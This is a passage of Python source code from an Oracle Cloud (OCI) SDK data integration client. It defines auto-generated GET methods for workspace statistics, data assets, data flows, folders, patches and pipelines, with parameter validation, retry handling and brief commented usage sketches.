def get_count_statistic(self, workspace_id, count_statistic_key, **kwargs):
"""
Retrieves statistics on a workspace. It returns an object with an array of property values, such as the number of projects,
applications, data assets, and so on.
:param str workspace_id: (required)
The workspace ID.
:param str count_statistic_key: (required)
A unique key of the container object, such as workspace, project, and so on, to count statistics for. Statistics are fetched for the given key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.CountStatistic`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_count_statistic.py.html>`__ to see an example of how to use the get_count_statistic API.
"""
resource_path = "/workspaces/{workspaceId}/countStatistics/{countStatisticKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_count_statistic got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"countStatisticKey": count_statistic_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="CountStatistic")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="CountStatistic")
def get_data_asset(self, workspace_id, data_asset_key, **kwargs):
"""
Retrieves details of a data asset using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_asset_key: (required)
The data asset key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataAsset`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_data_asset.py.html>`__ to see an example of how to use the get_data_asset API.
"""
resource_path = "/workspaces/{workspaceId}/dataAssets/{dataAssetKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataAssetKey": data_asset_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataAsset")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataAsset")
def get_data_entity(self, workspace_id, connection_key, schema_resource_name, data_entity_key, **kwargs):
"""
Retrieves the data entity details with the given name from the live schema.
:param str workspace_id: (required)
The workspace ID.
:param str connection_key: (required)
The connection key.
:param str schema_resource_name: (required)
The schema resource name used for retrieving schemas.
:param str data_entity_key: (required)
The key of the data entity.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataEntity`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_data_entity.py.html>`__ to see an example of how to use the get_data_entity API.
"""
resource_path = "/workspaces/{workspaceId}/connections/{connectionKey}/schemas/{schemaResourceName}/dataEntities/{dataEntityKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_entity got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"connectionKey": connection_key,
"schemaResourceName": schema_resource_name,
"dataEntityKey": data_entity_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataEntity")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataEntity")
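# Validation sketch: required path parameters are interpolated into
# resource_path, and None/empty/whitespace values are rejected locally before
# any HTTP request is made (identifiers below are placeholders):
#
#     try:
#         client.get_data_entity(
#             workspace_id,
#             "example-connection-key",
#             "EXAMPLE_SCHEMA",
#             "   ")  # whitespace-only data_entity_key
#     except ValueError as err:
#         print(err)  # Parameter dataEntityKey cannot be None, whitespace or empty string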
def get_data_flow(self, workspace_id, data_flow_key, **kwargs):
"""
Retrieves a data flow using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_key: (required)
The data flow key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str expand_references: (optional)
Used to expand references of the object. If the value is true, then all referenced objects are expanded. If the value is false, then shallow objects are returned in place of references. Default is false. Example: `?expandReferences=true` returns all objects of type data loader task.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlow`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_data_flow.py.html>`__ to see an example of how to use the get_data_flow API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlows/{dataFlowKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"expand_references"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_flow got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowKey": data_flow_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"expandReferences": kwargs.get("expand_references", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlow")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="DataFlow")
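# expand_references sketch: the flag is forwarded as the expandReferences
# query parameter, so referenced objects come back inline rather than as
# shallow stubs. Note it is documented as a string, so pass "true"/"false".
# Keys are placeholders; `client` is from the first sketch.
#
#     full_flow = client.get_data_flow(
#         workspace_id,
#         "example-data-flow-key",
#         expand_references="true").data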
def get_data_flow_validation(self, workspace_id, data_flow_validation_key, **kwargs):
"""
Retrieves a data flow validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str data_flow_validation_key: (required)
The key of the data flow validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DataFlowValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_data_flow_validation.py.html>`__ to see an example of how to use the get_data_flow_validation API.
"""
resource_path = "/workspaces/{workspaceId}/dataFlowValidations/{dataFlowValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_data_flow_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"dataFlowValidationKey": data_flow_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataFlowValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DataFlowValidation")
def get_dependent_object(self, workspace_id, application_key, dependent_object_key, **kwargs):
"""
Retrieves the details of a dependent object from an application.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str dependent_object_key: (required)
The dependent object key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.DependentObject`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_dependent_object.py.html>`__ to see an example of how to use the get_dependent_object API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/dependentObjects/{dependentObjectKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_dependent_object got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"dependentObjectKey": dependent_object_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DependentObject")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="DependentObject")
def get_external_publication(self, workspace_id, task_key, external_publications_key, **kwargs):
"""
Retrieves a published object in a task using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publications_key: (required)
The external published object key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublication`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_external_publication.py.html>`__ to see an example of how to use the get_external_publication API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublications/{externalPublicationsKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_external_publication got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationsKey": external_publications_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ExternalPublication")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ExternalPublication")
def get_external_publication_validation(self, workspace_id, task_key, external_publication_validation_key, **kwargs):
"""
Retrieves an external publication validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str task_key: (required)
The task key.
:param str external_publication_validation_key: (required)
The external published object key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.ExternalPublicationValidation`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_external_publication_validation.py.html>`__ to see an example of how to use the get_external_publication_validation API.
"""
resource_path = "/workspaces/{workspaceId}/tasks/{taskKey}/externalPublicationValidations/{externalPublicationValidationKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_external_publication_validation got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"taskKey": task_key,
"externalPublicationValidationKey": external_publication_validation_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ExternalPublicationValidation")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="ExternalPublicationValidation")
def get_folder(self, workspace_id, folder_key, **kwargs):
"""
Retrieves a folder using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str folder_key: (required)
The folder key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param list[str] projection: (optional)
This parameter allows users to specify which view of the object to return. CHILD_COUNT_STATISTICS - This option is used to get statistics on immediate children of the object by their type.
Allowed values are: "CHILD_COUNT_STATISTICS"
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Folder`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_folder.py.html>`__ to see an example of how to use the get_folder API.
"""
resource_path = "/workspaces/{workspaceId}/folders/{folderKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"projection"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_folder got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"folderKey": folder_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
if 'projection' in kwargs:
projection_allowed_values = ["CHILD_COUNT_STATISTICS"]
for projection_item in kwargs['projection']:
if projection_item not in projection_allowed_values:
raise ValueError(
"Invalid value for `projection`, must be one of {0}".format(projection_allowed_values)
)
query_params = {
"projection": self.base_client.generate_collection_format_param(kwargs.get("projection", missing), 'multi')
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Folder")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Folder")
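# projection sketch: the value is a list serialized in 'multi' collection
# format (one expanded query parameter per item) and is checked against the
# allowed values client-side, so a bad entry fails before any request is sent.
# Keys are placeholders; `client` is from the first sketch.
#
#     folder = client.get_folder(
#         workspace_id,
#         "example-folder-key",
#         projection=["CHILD_COUNT_STATISTICS"]).data
#
#     # projection=["SOMETHING_ELSE"] would raise ValueError locally.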
def get_patch(self, workspace_id, application_key, patch_key, **kwargs):
"""
Retrieves a patch in an application using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str application_key: (required)
The application key.
:param str patch_key: (required)
The patch key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Patch`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_patch.py.html>`__ to see an example of how to use the get_patch API.
"""
resource_path = "/workspaces/{workspaceId}/applications/{applicationKey}/patches/{patchKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_patch got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"applicationKey": application_key,
"patchKey": patch_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Patch")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
header_params=header_params,
response_type="Patch")
def get_pipeline(self, workspace_id, pipeline_key, **kwargs):
"""
Retrieves a pipeline using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_key: (required)
The pipeline key.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param str expand_references: (optional)
Used to expand references of the object. If the value is true, then all referenced objects are expanded. If the value is false, then shallow objects are returned in place of references. Default is false. Example: `?expandReferences=true` returns all objects of type data loader task.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.Pipeline`
:rtype: :class:`~oci.response.Response`
:example:
Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/dataintegration/get_pipeline.py.html>`__ to see an example of how to use the get_pipeline API.
"""
resource_path = "/workspaces/{workspaceId}/pipelines/{pipelineKey}"
method = "GET"
# Don't accept unknown kwargs
expected_kwargs = [
"retry_strategy",
"opc_request_id",
"expand_references"
]
extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
if extra_kwargs:
raise ValueError(
"get_pipeline got unknown kwargs: {!r}".format(extra_kwargs))
path_params = {
"workspaceId": workspace_id,
"pipelineKey": pipeline_key
}
path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
for (k, v) in six.iteritems(path_params):
if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
query_params = {
"expandReferences": kwargs.get("expand_references", missing)
}
query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
header_params = {
"accept": "application/json",
"content-type": "application/json",
"opc-request-id": kwargs.get("opc_request_id", missing)
}
header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
retry_strategy = self.retry_strategy
if kwargs.get('retry_strategy'):
retry_strategy = kwargs.get('retry_strategy')
if retry_strategy:
return retry_strategy.make_retrying_call(
self.base_client.call_api,
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Pipeline")
else:
return self.base_client.call_api(
resource_path=resource_path,
method=method,
path_params=path_params,
query_params=query_params,
header_params=header_params,
response_type="Pipeline")
def get_pipeline_validation(self, workspace_id, pipeline_validation_key, **kwargs):
"""
Retrieves a pipeline validation using the specified identifier.
:param str workspace_id: (required)
The workspace ID.
:param str pipeline_validation_key: (required)
The key of the pipeline validation.
:param str opc_request_id: (optional)
Unique Oracle-assigned identifier for the request. If
you need to contact Oracle about a particular request,
please provide the request ID.
:param obj retry_strategy: (optional)
A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.
This should be one of the strategies available in the :py:mod:`~oci.retry` module. A convenience :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY`
is also available. The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.
To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.
:return: A :class:`~oci.response.Response` object with data of type :class:`~oci.data_integration.models.PipelineValidation`
:rtype: :class:`~oci.response.Response`
:example:
